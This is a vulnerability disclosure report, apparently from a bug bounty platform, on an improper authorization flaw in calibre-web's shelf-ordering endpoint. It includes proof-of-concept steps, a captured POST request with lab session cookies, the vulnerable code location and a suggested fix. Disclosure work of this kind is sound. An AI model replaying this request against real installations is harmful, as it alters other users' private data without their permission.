Improper Authorization in janeczku/calibre-web
Jan 25th 2022
With default settings, low-level users will not have permission to edit the sort order of books in private shelf of another user. However, due to incorrect checking, the application does not work as intended.
Proof of Concept
- Step 1: Login with admin account and go to http://hostname:8083/admin/user/new. Create new user "test1" with default permissions (only "Show *" permissions).
- Step 2: admin create private shelf, and books to shelf.
- Step 3: test1 get id of admin's private shelf (brute-force, leak data,...) and go to http://hostname:8083/shelf/order/:id (in Poc http://192.168.150.133:8083/shelf/order/3).
- Step 4: test1 click save and capture request in burpsuite. test1 put data and recall request to edit the sort order of books in shelf 3 (private shelf of admin) Request:
POST /shelf/order/3 HTTP/1.1 Host: 192.168.150.133:8083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 110 Origin: http://192.168.150.133:8083 Connection: close Referer: http://192.168.150.133:8083/shelf/order/3 Cookie: session=.eJwljjtuAzEMBe-iOgV_4oq-zEKkSNgIkAC7dhXk7lkj3bx5zfy0vY487-32PF750fbHaremle4oAOUMmtFjRZ_OtapnRAayJktVokyrraoMttE7oW3ahZaJEfCQoVM3zgVAsiYNjjAuiU18GLuvyezl-D5gQhGJoLYr5HXm8V_D14zzqP35_ZlflwAtGIiKZkXxZpqDJ-lanmEis_fZC9vvH4AIP8o.Ye-55g.y2WeHCTSR6u3ZeXWL6zHGWmQWh4; remember_token=3|a0ad3ac22b2a1c95b6d18388d0186fbcd887a7b02378a4bb2498dc8a32770e173b14bae215b37137207d498cc4a6bdfd8c1b0784ee2f81085bebf3e6d3006edd Upgrade-Insecure-Requests: 1 1=2&2=1&csrf_token=IjA2ZjA4MTE2MTk5ZjJjZjA4MTJhODNhMjZkZGJlYzk0NGE1NWE1ZjEi.Ye-55g.t3T1U1i3rXOQoAK-1Wi6sUtXm1I
- PoC: https://drive.google.com/file/d/1iyO9WntPQq7b_2EXq76JZz3vT89jOnP4
In line 362 (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L362), server checks request's method (POST) and processes the data directly, without checking the user's permission to the shelf. I recommend putting code for user permissions check (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L380) at the top of order_shelf function.
Low-level user can edit the sort order of books in any shelf (include private shelf of another user).
We are processing your report and will contact the janeczku/calibre-web team within 24 hours. a year ago
We have sent a fix follow up to the janeczku/calibre-web team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the janeczku/calibre-web team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the janeczku/calibre-web team. This report is now considered stale. a year ago
to join this conversation